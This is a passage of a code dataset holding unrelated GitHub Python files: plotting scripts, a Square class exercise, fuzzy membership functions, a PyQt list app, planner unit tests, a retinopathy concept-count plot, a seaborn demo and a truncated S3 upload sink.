np.array([Kxc_GG])\n","repo_name":"f-fathurrahman/ffr-learns-gpaw","sub_path":"my_gpaw/response/density_kernels.py","file_name":"density_kernels.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18955742169","text":"import matplotlib.pyplot as plt\nfrom matplotlib import rc\n\nfrom src.experiment.fs_study.setup import classifiers, experiment_setups\nfrom src.features.selection.wrappers import fs_wrappers\nfrom src.utils.file_handling.processors import CsvProcessor\n\nfont = {'family': 'normal',\n 'weight': 'normal',\n 'size': 12}\nrc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})\n\n## for Palatino and other serif fonts use:\nrc('font', **{'family': 'serif', 'serif': ['Palatino']})\nrc('text', usetex=True)\n\ndata_point_labels = [0.01, 0.02, 0.03, 0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1]\nmetric_positions = [0, 3, 5, 7, 13, 15]\nmarkers = ['d', 'o', 'h', '*', 'P', 'p', 's', 'v', '>', '<']\n\nfor experiment_name in experiment_setups.keys():\n plot_data = {}\n for wrapper in fs_wrappers:\n for classifier in classifiers:\n plot_data[classifier.name] = {}\n val_filename = '_'.join([wrapper.name, classifier.name, \"search\"])\n test_filename = '_'.join([wrapper.name, classifier.name, \"search\", \"test\"])\n print(\"Processing files {0} and {1}\".format(val_filename, test_filename))\n\n val_header, val_data = CsvProcessor().read_file(\n filename='summary/' + experiment_name + \"/\" + val_filename)\n test_header, test_data = CsvProcessor().read_file(\n filename='summary/' + experiment_name + \"/\" + test_filename)\n\n if val_header is not None and val_data is not None:\n dataset = ''\n labels = []\n pos = 0\n for i, row in enumerate(val_data):\n if row[0].split('_')[0] != dataset:\n if i == 0:\n dataset = row[0].split('_')[0]\n else:\n plt.title('-'.join([experiment_name.replace('_', '-'), wrapper.name, classifier.name,\n dataset.replace('_', '')]))\n plt.ylabel(r'Quality metrics', fontsize=13)\n plt.xlabel(r'NFEs\\textsubscript{max}', fontsize=13)\n plt.xlim([data_point_labels[0], data_point_labels[-1]])\n plt.ylim(top=1)\n plt.xticks(range(0, 14), data_point_labels)\n plt.tick_params()\n plt.legend(labels=labels, fancybox=False, framealpha=0.9)\n plt.tight_layout()\n plt.grid(b=True, linestyle=':')\n plt.show()\n # plt.savefig('-'.join([experiment_name.replace('_', '-'), wrapper.name, classifier.name,\n # dataset.replace('_', '')]) + \".pdf\",\n # format='pdf', dpi=300)\n plt.close()\n labels = []\n dataset = row[0].split('_')[0]\n pos = 0\n\n if pos in metric_positions:\n scores = [float(score) for score in row[1:]]\n plt.plot(scores, lw=0.75, ms=4, alpha=0.5, marker=markers[metric_positions.index(pos)])\n metric = row[0][row[0].find(dataset) + len(dataset) + 1:].replace('_', '')\n labels.append(metric)\n pos += 1\n plt.close()\n","repo_name":"MarioDudjak/FeatureSelectionWorkflow","sub_path":"reports/visualization/median_search_all_metrics_per_classifier_and_dataset.py","file_name":"median_search_all_metrics_per_classifier_and_dataset.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"42961076277","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n'''this module defines a square by: (based on 1-square.py)\n\n Private instance attribute: size\n Instantiation with optional size: def __init__(self, size=0):\n size must be an integer, otherwise raise a TypeError exception with\n the message size must be an integer\n if size is less than 0, raise a ValueError exception\n with the message size must be >= 0\n\n It also determine the area of the square\n '''\n\n\nclass Square:\n '''A Square class that defines a square and initialize\n the size attribute'''\n def __init__(self, size=0, position=(0, 0)):\n '''Initialize the size and position of a square\n\n Args:\n size(int): Size of the square\n\n '''\n self.size = size\n self.position = position\n\n @property\n def size(self):\n '''A method that retrieve the size of the square'''\n return self.__size\n\n @size.setter\n def size(self, value):\n '''Set the valid value of the size attribute'''\n if isinstance(value, int):\n if value < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = value\n else:\n raise TypeError(\"size must be an integer\")\n\n @property\n def position(self):\n '''A method that retrieve the size of the square'''\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"Define Setter method for __postion\"\"\"\n if not isinstance(value, tuple) or len(value) != 2:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif not isinstance(value[0], int) or not isinstance(value[1], int):\n raise TypeError(\"position must be a tuple of 2 posetive integers\")\n elif value[1] < 0 or value[0] < 0:\n raise ValueError(\"position must be a tuple of 2 positive integers\")\n else:\n self.__position = value\n\n def area(self):\n '''Determine the area of a square and return it'''\n return self.__size ** 2\n\n def my_print(self):\n \"\"\"Defining my_print method\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__position[1]):\n print()\n for i in range(self.__size):\n print(\" \" * self.__position[0], end=\"\")\n print('#' * self.__size)\n","repo_name":"solomonferede1/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"11606481940","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Membership_Function:\n @staticmethod\n def triangle(x, a, m, b):\n \"\"\"\n Retorna a função de pertinência triangular.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - a: float\n Valor do ponto de início da função.\n - m: float\n Valor do ponto médio da função.\n - b: float\n Valor do ponto de fim da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência triangular.\n \"\"\"\n y = np.zeros(x.shape[0]) # Definindo um array de saída do tamnho da entrada.\n first_half = np.logical_and(a < x, x <= m) # Definindo o intervalo de 'subida' da função.\n y[first_half] = (x[first_half] - a) / (m - a) # Definindo os valores da saída para o intervalo de 'subida'.\n second_half = np.logical_and(m <= x, x < b) # Definindo o intervalo de 'descida' da função.\n y[second_half] = (b - x[second_half]) / (b - m) # Definindo os valores da saída para o intervalo de 'descida'.\n return y\n \n @staticmethod\n def trapezoidal(x, a, m, n, b):\n \"\"\"\n Retorna a função de pertinência trapezoidal.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - a: float\n Valor do ponto de início da função.\n - m: float\n Valor do ponto médio esquerdo da função.\n - n: float\n Valor do ponto médio direito da função.\n - b: float\n Valor do ponto de fim da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência trapezoidal.\n \"\"\"\n y = np.zeros(x.shape[0]) # Definindo saída do tamaho da entrada.\n first_part = np.logical_and(a < x, x <= m) # Definindo o intervalo de subida.\n y[first_part] = (x[first_part] - a) / (m - a) # Definindo os valores da saída no intervalo de subida.\n second_part = np.logical_and(m < x, x < n) # Definindo o intervalo entre subida e decida.\n y[second_part] = 1 # Definindo o valor 1 para todo o intervalo entre subida e decida.\n third_part = np.logical_and(n <= x, x < b) # Definindo o intervalo de decida. \n y[third_part] = (b - x[third_part]) / (b - n) # Defininido os valores de saída para o intervalo de saída.\n return y\n \n @staticmethod\n def gaussian(x, k, m):\n \"\"\"\n Retorna a função de pertinência gaussiana.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - k: float\n Valor do parâmetro de largura da função.\n - m: float\n Valor do parâmetro de centro da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência gaussiana.\n \"\"\"\n k = k / 2\n expoent = (-1) * ((x - m) ** 2) / (k ** 2)\n return np.exp(expoent)\n \n @staticmethod\n def test_functions(type):\n \"\"\"\n Retorna várias funções de pertinência para testes.\n\n Parâmetros:\n - type: int\n Tipo de teste a ser retornado.\n\n Retorno:\n - range: np.ndarray\n Valores de entrada.\n - functions: np.ndarray\n Valores de saída correspondentes às funções de pertinência.\n \"\"\"\n range = np.arange(0, 100, 0.1)\n \n if type == 0: # Retorna uma função de cada tipo de maneira sequêncial\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.trapezoidal(range, 30, 40, 60, 70),\n Membership_Function.gaussian(range, 10, 85)\n ])\n if type == 1: # Retorna vários triângulos com 'm' iguais\n return range, np.array([\n Membership_Function.triangle(range, 0, 50, 100),\n Membership_Function.triangle(range, 10, 50, 90),\n Membership_Function.triangle(range, 20, 50, 80),\n Membership_Function.triangle(range, 30, 50, 70),\n Membership_Function.triangle(range, 40, 50, 60)\n ])\n if type == 2: # Retorna vários triangulos complementares\n return range, np.array([\n Membership_Function.triangle(range, 0, 0, 20),\n Membership_Function.triangle(range, 0, 20, 40),\n Membership_Function.triangle(range, 20, 40, 60),\n Membership_Function.triangle(range, 40, 60, 80),\n Membership_Function.triangle(range, 60, 80, 100),\n Membership_Function.triangle(range, 80, 100, 100)\n ])\n if type == 3: # Retorna vários trapézios com 'n' e 'm' iguais\n return range, np.array([\n Membership_Function.trapezoidal(range, 0, 40, 60, 100),\n Membership_Function.trapezoidal(range, 10, 40, 60, 90),\n Membership_Function.trapezoidal(range, 20, 40, 60, 80),\n Membership_Function.trapezoidal(range, 30, 40, 60, 70)\n ])\n if type == 4: # Retorna vários trapezios complementares\n return range, np.array([\n Membership_Function.trapezoidal(range, -1, 0, 5, 15),\n Membership_Function.trapezoidal(range, 5, 15, 25, 35),\n Membership_Function.trapezoidal(range, 25, 35, 45, 55),\n Membership_Function.trapezoidal(range, 45, 55, 65, 75),\n Membership_Function.trapezoidal(range, 65, 75, 85, 95),\n Membership_Function.trapezoidal(range, 85, 95, 100, 100)\n ])\n if type == 5: # Retorna várias gaussianas com 'm' iguais\n return range, np.array([\n Membership_Function.gaussian(range, 40, 50),\n Membership_Function.gaussian(range, 30, 50),\n Membership_Function.gaussian(range, 20, 50),\n Membership_Function.gaussian(range, 10, 50)\n ])\n if type == 6: # Retorna várias gaussianas complementares\n return range, np.array([\n Membership_Function.gaussian(range, 20, 20),\n Membership_Function.gaussian(range, 20, 0),\n Membership_Function.gaussian(range, 20, 40),\n Membership_Function.gaussian(range, 20, 60),\n Membership_Function.gaussian(range, 20, 80),\n Membership_Function.gaussian(range, 20, 100)\n ])\n if type == 7: # Retorna testes para opração de união\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.trapezoidal(range, 20, 50, 60, 95),\n Membership_Function.gaussian(range, 10, 80)\n ])\n if type == 8: # Retorna testes para opração de união\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.gaussian(range, 10, 30)\n ])\n if type == 9: # Retorna testes para opração de interseção\n return range, np.array([\n Membership_Function.trapezoidal(range, 5, 20, 40, 60),\n Membership_Function.gaussian(range, 20, 50)\n ])","repo_name":"Gustavo01rb/Fuzzy","sub_path":"fuzzy/membership_function.py","file_name":"membership_function.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"74157388582","text":"import sys\nfrom PyQt5.QtWidgets import QInputDialog, QLineEdit, QApplication, QMainWindow\nfrom listNancy import Ui_Dialog\n\nclass addForm(QMainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.ui.pushAdd.clicked.connect(self.addlisting)\n self.ui.pushEdit.clicked.connect(self.editlisting)\n self.ui.pushDelete.clicked.connect(self.dellisting)\n self.ui.pushDeleteAll.clicked.connect(self.delallist)\n\n def addlisting(self):\n self.ui.listWidget.addItem(self.ui.lineEdit.text())\n self.ui.lineEdit.setText('')\n self.ui.lineEdit.setFocus()\n\n def editlisting(self):\n row = self.ui.listWidget.currentRow()\n self.ui.listWidget.takeItem(row)\n text, okPressed = QInputDialog.getText(self, \"Get text\", \"New text:\", QLineEdit.Normal, \"\")\n if okPressed and text != '':\n self.ui.listWidget.insertItem(row, str(text))\n\n def dellisting(self):\n self.ui.listWidget.takeItem(self.ui.listWidget.currentRow())\n\n def delallist(self):\n self.ui.listWidget.clear()\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n addApp = addForm()\n addApp.show()\n sys.exit(app.exec_())\n","repo_name":"rntafirenyika/Portfolio","sub_path":"6. BSC Computing - Unisa/Year 1/INF1511 Visual Programming 1 with Python/OneDrive_2023-09-12/INF1511 GUI/List example/callListNancy.pyw","file_name":"callListNancy.pyw","file_ext":"pyw","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"32386449493","text":"import numpy as np\nimport random\nimport tensorflow as tf\nimport unittest\nfrom itertools import product\n\nfrom planner import GridworldModel, BanditsModel\nfrom gridworld import Direction\nfrom gridworld import GridworldMdp, GridworldMdpWithDistanceFeatures\nfrom gridworld import NStateMdpGaussianFeatures\nfrom agents import OptimalAgent, ImmediateRewardAgent\n\n\nclass TestPlanner(unittest.TestCase):\n\n\n def test_gridworld_planner(self):\n def check_model_equivalent(model, query, weights, mdp, num_iters):\n with tf.Session() as sess:\n sess.run(model.initialize_op)\n (qvals,) = model.compute(\n ['q_values'], sess, mdp, query, weight_inits=weights)\n\n agent = OptimalAgent(gamma=model.gamma, num_iters=num_iters)\n for i, proxy in enumerate(model.proxy_reward_space):\n for idx, val in zip(query, proxy):\n mdp.rewards[idx] = val\n agent.set_mdp(mdp)\n check_qvals_equivalent(qvals[i], agent, mdp)\n\n def check_qvals_equivalent(qvals, agent, mdp):\n for state in mdp.get_states():\n if mdp.is_terminal(state):\n continue\n x, y = state\n for action in mdp.get_actions(state):\n expected_q = agent.qvalue(state, action)\n action_num = Direction.get_number_from_direction(action)\n actual_q = qvals[y, x, action_num]\n # Using softmax, not max, so expect limited accuracy\n self.assertAlmostEqual(expected_q, actual_q, places=2)\n\n np.random.seed(1)\n random.seed(1)\n dim = 4\n grid = GridworldMdp.generate_random(8, 8, 0.1, dim)\n mdp = GridworldMdpWithDistanceFeatures(grid)\n mdp.rewards = np.random.randint(-9, 10, size=[dim])\n query = [0, 3]\n other_weights = mdp.rewards[1:3]\n # Use beta_planner = 1000 so that softmax is approximately max\n model = GridworldModel(\n dim, 0.9, len(query), 2, 1, None, 1, 1000, [], 0.1, False, True,\n 8, 8, 25)\n check_model_equivalent(model, query, other_weights, mdp, 25)\n\n\n\n def test_bandits_planner(self):\n def check_model_equivalent(model, query, weights, mdp, num_iters):\n with tf.Session() as sess:\n sess.run(model.initialize_op)\n (qvals,) = model.compute(['q_values'], sess, mdp, query, weight_inits=weights)\n\n agent = ImmediateRewardAgent(gamma=model.gamma)\n for i, proxy in enumerate(model.proxy_reward_space):\n mdp.change_reward(proxy)\n\n # for idx, val in zip(query, proxy):\n # mdp.rewards[idx] = val\n agent.set_mdp(mdp)\n check_qvals_equivalent(qvals[:,i], agent, mdp)\n\n def check_qvals_equivalent(qvals, agent, mdp):\n for state in mdp.get_states():\n if mdp.is_terminal(state):\n return\n expected_q = agent.qvalue(state, state)\n actual_q = qvals[state]\n self.assertAlmostEqual(expected_q, actual_q, places=5)\n\n dim = 5\n weights = np.random.randint(-9, 10, size=[dim])\n mdp = NStateMdpGaussianFeatures(\n num_states=7, rewards=weights, start_state=0,\n preterminal_states=[], feature_dim=dim, num_states_reachable=7)\n # query = [0, 2, 3]\n query = [0, 1, 2, 3, 4]\n # other_weights = np.array([weights[1], weights[4]])\n other_weights = np.zeros(0)\n model = BanditsModel(\n dim, 0.9, len(query), 2, 1, None, 1, 1000, [], 0.1, False, True)\n check_model_equivalent(model, query, other_weights, mdp, 20)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"SoerenMind/Inverse_Reward_Design","sub_path":"Code/planner_test.py","file_name":"planner_test.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"28949398831","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\n#The code use to create the lower row of Figure 2\n#Plot the concept predictions for the FGADR testset for each DR level.\n\n#Inspect the FGADR test set instead:\nconceptPredictions_test = pd.read_csv('./SequentialModelOutput/RawDensenet121_conceptPredictions_FGADRTestset.csv',index_col = 'Unnamed: 0')\n\n#Counting number of positive predictions for MA\nMA_level0_predictions = 0\nMA_level1_predictions = 0\nMA_level2_predictions= 0\nMA_level3_predictions = 0\nMA_level4_predictions = 0\n#Repeat for HE:\nHE_level0_predictions = 0\nHE_level1_predictions = 0\nHE_level2_predictions= 0\nHE_level3_predictions = 0\nHE_level4_predictions = 0\n#Soft exudates:\nSoftEx_level0_predictions = 0\nSoftEx_level1_predictions = 0\nSoftEx_level2_predictions= 0\nSoftEx_level3_predictions = 0\nSoftEx_level4_predictions = 0\n#Hard exudates:\nHardEx_level0_predictions = 0\nHardEx_level1_predictions = 0\nHardEx_level2_predictions= 0\nHardEx_level3_predictions = 0\nHardEx_level4_predictions = 0\n#NV:\nNV_level0_predictions = 0\nNV_level1_predictions = 0\nNV_level2_predictions= 0\nNV_level3_predictions = 0\nNV_level4_predictions = 0\n#IRMA:\nIRMA_level0_predictions = 0\nIRMA_level1_predictions = 0\nIRMA_level2_predictions= 0\nIRMA_level3_predictions = 0\nIRMA_level4_predictions = 0\n\n#Count the number of observations for each DR level: \nlevel0_count = 0\nlevel1_count = 0\nlevel2_count = 0\nlevel3_count = 0\nlevel4_count = 0\nfor i in range(conceptPredictions_test.shape[0]):\n #Get the DR level\n dr_level = conceptPredictions_test.iloc[i,-1]\n print('Level of DR:',dr_level)\n #Get the raw concept predictions:\n concept_data = conceptPredictions_test.iloc[i,1]\n #Since these are (of unknown causes) interpreted as a string-list\n #We need to convert them to a proper list of float-values:\n concept_data = concept_data.strip('\"')\n concept_data = concept_data.strip('[]')\n concept_data = list(concept_data.split(','))\n concept_data = list(map(float,concept_data))\n print('Concept data:',concept_data)\n ma_concept = concept_data[0]\n he_concept = concept_data[1]\n softEx_concept = concept_data[2]\n hardEx_concept = concept_data[3]\n nv_concept = concept_data[4]\n irma_concept = concept_data[5]\n print('MA concept:',ma_concept)\n print('NV concept:',nv_concept)\n if dr_level == 0:\n level0_count+=1\n if ma_concept>=0:\n MA_level0_predictions+=1\n if he_concept>=0:\n HE_level0_predictions+=1\n if softEx_concept>=0:\n SoftEx_level0_predictions+=1\n if hardEx_concept>=0:\n HardEx_level0_predictions+=1\n if nv_concept>=0:\n NV_level0_predictions+=1\n if irma_concept>=0:\n IRMA_level0_predictions+=1\n elif dr_level ==1:\n level1_count+=1\n if ma_concept>=0:\n MA_level1_predictions+=1\n if he_concept>=0:\n HE_level1_predictions+=1\n if softEx_concept>=0:\n SoftEx_level1_predictions+=1\n if hardEx_concept>=0:\n HardEx_level1_predictions+=1\n if nv_concept>=0:\n NV_level1_predictions+=1\n if irma_concept>=0:\n IRMA_level1_predictions+=1\n elif dr_level == 2:\n level2_count+=1\n if ma_concept>=0:\n MA_level2_predictions+=1\n if he_concept>=0:\n HE_level2_predictions+=1\n if softEx_concept>=0:\n SoftEx_level2_predictions+=1\n if hardEx_concept>=0:\n HardEx_level2_predictions+=1\n if nv_concept>=0:\n NV_level2_predictions+=1\n if irma_concept>=0:\n IRMA_level2_predictions+=1\n elif dr_level == 3:\n level3_count+=1\n if ma_concept>=0:\n MA_level3_predictions+=1\n if he_concept>=0:\n HE_level3_predictions+=1\n if softEx_concept>=0:\n SoftEx_level3_predictions+=1\n if hardEx_concept>=0:\n HardEx_level3_predictions+=1\n if nv_concept>=0:\n NV_level3_predictions+=1\n if irma_concept>=0:\n IRMA_level3_predictions+=1\n elif dr_level == 4:\n level4_count+=1\n if ma_concept>=0:\n MA_level4_predictions+=1\n if he_concept>=0:\n HE_level4_predictions+=1\n if softEx_concept>=0:\n SoftEx_level4_predictions+=1\n if hardEx_concept>=0:\n HardEx_level4_predictions+=1\n if nv_concept>=0:\n NV_level4_predictions+=1\n if irma_concept>=0:\n IRMA_level4_predictions+=1\n \nprint('MA for DR level 0:', MA_level0_predictions)\nprint('HE for DR level 0:',HE_level0_predictions)\nprint('SoftEx for DR level 0:',SoftEx_level0_predictions)\nprint('HardEx for DR level 0:',HardEx_level0_predictions)\nprint('NV for DR level 0:',NV_level0_predictions)\nprint('IRMA for DR level 0:',IRMA_level0_predictions)\n\nprint('MA for DR level 1:', MA_level1_predictions)\nprint('HE for DR level 1:',HE_level1_predictions)\nprint('SoftEx for DR level 1:',SoftEx_level1_predictions)\nprint('HardEx for DR level 1:',HardEx_level1_predictions)\nprint('NV for DR level 1:',NV_level1_predictions)\nprint('IRMA for DR level 1:',IRMA_level1_predictions)\n\nprint('MA for DR level 2:', MA_level2_predictions)\nprint('HE for DR level 2:',HE_level2_predictions)\nprint('SoftEx for DR level 2:',SoftEx_level2_predictions)\nprint('HardEx for DR level 2:',HardEx_level2_predictions)\nprint('NV for DR level 2:',NV_level2_predictions)\nprint('IRMA for DR level 2:',IRMA_level2_predictions)\n\nprint('MA for DR level 3:', MA_level3_predictions)\nprint('HE for DR level 3:',HE_level3_predictions)\nprint('SoftEx for DR level 3:',SoftEx_level3_predictions)\nprint('HardEx for DR level 3:',HardEx_level3_predictions)\nprint('NV for DR level 3:',NV_level3_predictions)\nprint('IRMA for DR level 3:',IRMA_level3_predictions)\n\nprint('MA for DR level 4:', MA_level4_predictions)\nprint('HE for DR level 4:',HE_level4_predictions)\nprint('SoftEx for DR level 4:',SoftEx_level4_predictions)\nprint('HardEx for DR level 4:',HardEx_level4_predictions)\nprint('NV for DR level 4:',NV_level4_predictions)\nprint('IRMA for DR level 4:',IRMA_level4_predictions)\n\nprint('Total number of level 0 images:',level0_count)\nprint('Total number of level 1 images:',level1_count)\nprint('Total number of level 2 images:',level2_count)\nprint('Total number of level 3 images:',level3_count)\nprint('Total number of level 4 images:',level4_count)\n\n#plot barcharts for each DR level\nnum_concepts = 6\nbar_width = 0.35\n# create location for each bar. scale by an appropriate factor to ensure \n# the final plot doesn't have any parts overlapping\nindex = np.arange(num_concepts) * bar_width\nprint('Index:',index)\nmy_colors = mcolors.TABLEAU_COLORS\nnames = list(my_colors)\nprint('Colors to choose:',names)\nbar_x = []\nplot_conceptNames = ['MA','HE','EX','SE','IRMA','NV']\n#Divide by number of images (50 for each DR level) to get the percentage concept count ranging from 0 to 1\nlevel_0_conceptCounts = [MA_level0_predictions/level0_count,HE_level0_predictions/level0_count,HardEx_level0_predictions/level0_count,SoftEx_level0_predictions/level0_count,IRMA_level0_predictions/level0_count,NV_level0_predictions/level0_count]\nlevel_1_conceptCounts = [MA_level1_predictions/level1_count,HE_level1_predictions/level1_count,HardEx_level1_predictions/level1_count,SoftEx_level1_predictions/level1_count,IRMA_level1_predictions/level1_count,NV_level1_predictions/level1_count]\nlevel_2_conceptCounts = [MA_level2_predictions/level2_count,HE_level2_predictions/level2_count,HardEx_level2_predictions/level2_count,SoftEx_level2_predictions/level2_count,IRMA_level2_predictions/level2_count,NV_level2_predictions/level2_count]\nlevel_3_conceptCounts = [MA_level3_predictions/level3_count,HE_level3_predictions/level3_count,HardEx_level3_predictions/level3_count,SoftEx_level3_predictions/level3_count,IRMA_level3_predictions/level3_count,NV_level3_predictions/level3_count]\nlevel_4_conceptCounts = [MA_level4_predictions/level4_count,HE_level4_predictions/level4_count,HardEx_level4_predictions/level4_count,SoftEx_level4_predictions/level4_count,IRMA_level4_predictions/level4_count,NV_level4_predictions/level4_count]\nfor i in range(6):\n bar_x.append(i*bar_width)\n#Plotting the predicted concept counts for DR levels 1-4 \n#In order to compare with the TCAV scores\nfig, ax = plt.subplots(1,4, figsize=(32,8))\n\n#https://matplotlib.org/3.1.0/gallery/subplots_axes_and_figures/subplots_demo.html#sphx-glr-gallery-subplots-axes-and-figures-subplots-demo-py\n#DR level 1\nax[0].bar(bar_x, level_1_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[0].set_title('DR level 1',fontsize=32)\nax[0].set_xticks(bar_x)\nax[0].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[0].set_ylim((0,1.05))\n\n#DR level 2\nax[1].bar(bar_x, level_2_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[1].set_title('DR level 2',fontsize=32)\nax[1].set_xticks(bar_x)\nax[1].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[1].set_ylim((0,1.05))\n\n#DR level 3\nax[2].bar(bar_x, level_3_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[2].set_title('DR level 3',fontsize=32)\nax[2].set_xticks(bar_x)\nax[2].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[2].set_ylim((0,1.05))\n\n#DR level 4\nax[3].bar(bar_x, level_4_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[3].set_title('DR level 4',fontsize=32)\nax[3].set_xticks(bar_x)\nax[3].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[3].set_ylim((0,1.05))\n\nax[0].set_ylabel('Concept count',fontsize=32)\nax[0].set_yticklabels([0.0,0.2,0.4,0.6,0.8,1.0],fontsize=32)\n# Hide x labels and tick labels for top plots and y ticks for right plots.\nax[1].label_outer()\nax[2].label_outer()\nax[3].label_outer()\n\n\n#Shrink the space between the subplots:\nplt.subplots_adjust(wspace=0.1)\nplt.savefig('PlotBottleneckConceptCounts_FGADRTestset_subplots.png', bbox_inches = 'tight')\n","repo_name":"AndreaStoraas/ConceptExplanations_DR_grading","sub_path":"SequentialBottleneck_experiments/PlotConceptPredictions_FGADRTestset.py","file_name":"PlotConceptPredictions_FGADRTestset.py","file_ext":"py","file_size_in_byte":10311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37407092455","text":"# Demo code to show how to use pandas nad seaborn\r\nimport seaborn as sns\r\n\r\n\r\n# loads test data\r\niris_df = sns.load_dataset(\"iris\") # ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species']\r\n\r\n\r\n\r\nprint(iris_df.columns) # Get your df columns\r\n\r\n# stores only the species\r\nspecies = iris_df[\"species\"]\r\nprint(species)\r\n\r\n# stores only the petal info\r\npetal_info = iris_df[[\"sepal_length\", \"sepal_width\", \"petal_length\", \"petal_width\"]]\r\nprint(petal_info)\r\n\r\n# stoes the petals smaller than 4.5\r\nsmall_sepal_length = iris_df[iris_df[\"sepal_length\"] < 4.5 ]\r\nprint(small_sepal_length)\r\n\r\n\r\n# stoes the mean for sepal width per species\r\nmean_sepal_width = iris_df.groupby(\"species\")[\"sepal_width\"].mean()\r\nprint(mean_sepal_width)\r\n\r\n\r\n# import matplotlib to display charts\r\nimport matplotlib.pyplot as plt\r\n\r\n# Shows the bar chart of sepal width average per species\r\nplt.figure()\r\n# passes data to display to the barplot method\r\n# sns.barplot(x=\"sepal_width\", y=\"species\", data=iris_df)\r\n\r\nsns.scatterplot(x=\"sepal_length\", y=\"sepal_width\", data=iris_df)\r\n\r\n# displays chart \r\nplt.show()\r\n\r\n# This will return a histogram\r\nsns.histplot(data=iris_df, x=\"sepal_width\") # Histogram\r\nplt.show()\r\n# This will return a boxplot\r\nsns.boxplot(y=iris_df[\"sepal_width\"])\r\n\r\n# Box plot using plt\r\n\r\nplt.boxplot(iris_df[\"sepal_width\"]) # Matplotlib ###\r\nplt.show()\r\n# Vioin plot\r\n\r\nsns.violinplot(y=iris_df[\"sepal_length\"])\r\nplt.show()\r\n# Countplot\r\n\r\nsns.countplot(x='species', data=iris_df)\r\nplt.show()\r\n\r\n# Pairplot\r\nsns.pairplot(iris_df);","repo_name":"HyperionDevBootcamps/C4_DS_lecture_examples","sub_path":"Lecture code/Data Analysis and Visualisation/data_visualisations_examples.py","file_name":"data_visualisations_examples.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"36"} +{"seq_id":"70050077863","text":"import os\nimport tempfile\nfrom typing import Iterator, List, Optional, Tuple\n\nimport boto3\n\nfrom pipereport.base.sink import BaseSink\n\n\nclass S3Sink(BaseSink):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n client_args = {\"service_name\": \"s3\"}\n endpoint_url = kwargs.pop(\"endpoint_url\", None)\n if endpoint_url is not None:\n client_args[\"endpoint_url\"] = endpoint_url\n client_args[\"aws_access_key_id\"] = self.required_credential(\"aws_access_key_id\")\n client_args[\"aws_secret_access_key\"] = self.required_credential(\n \"aws_secret_access_key\"\n )\n self.client_args = client_args\n\n self.bucket = self.required_field(\"bucket\")\n\n self.session = None\n self.s3 = None\n\n def connect(self):\n self.session = boto3.session.Session()\n self.s3 = self.session.client(**self.client_args)\n\n def write_block(\n self,\n source_iterator: Iterator[Tuple],\n object_id: str,\n blocksize: int = -1,\n columns: Optional[List[str]] = None,\n sep: str = \"\\t\",\n ):\n self.telemetry.add_object(object_id, columns)\n with tempfile.TemporaryDirectory() as tmpdirname:\n cachefiledir = os.path.join(tmpdirname, os.path.dirname(object_id))\n if cachefiledir and not os.path.exists(cachefiledir):\n os.makedirs(cachefiledir)\n cachefile = os.path.join(tmpdirname, object_id)\n with open(cachefile, \"w\") as cache:\n block_written = 0\n for entry in source_iterator:\n cache.write(sep.join(entry) + \"\\n\")\n block_written += 1\n if block_written == blocksize:\n break\n self.telemetry.add_entries(object_id, block_written)\n self.s3.upload_file(cachefile, 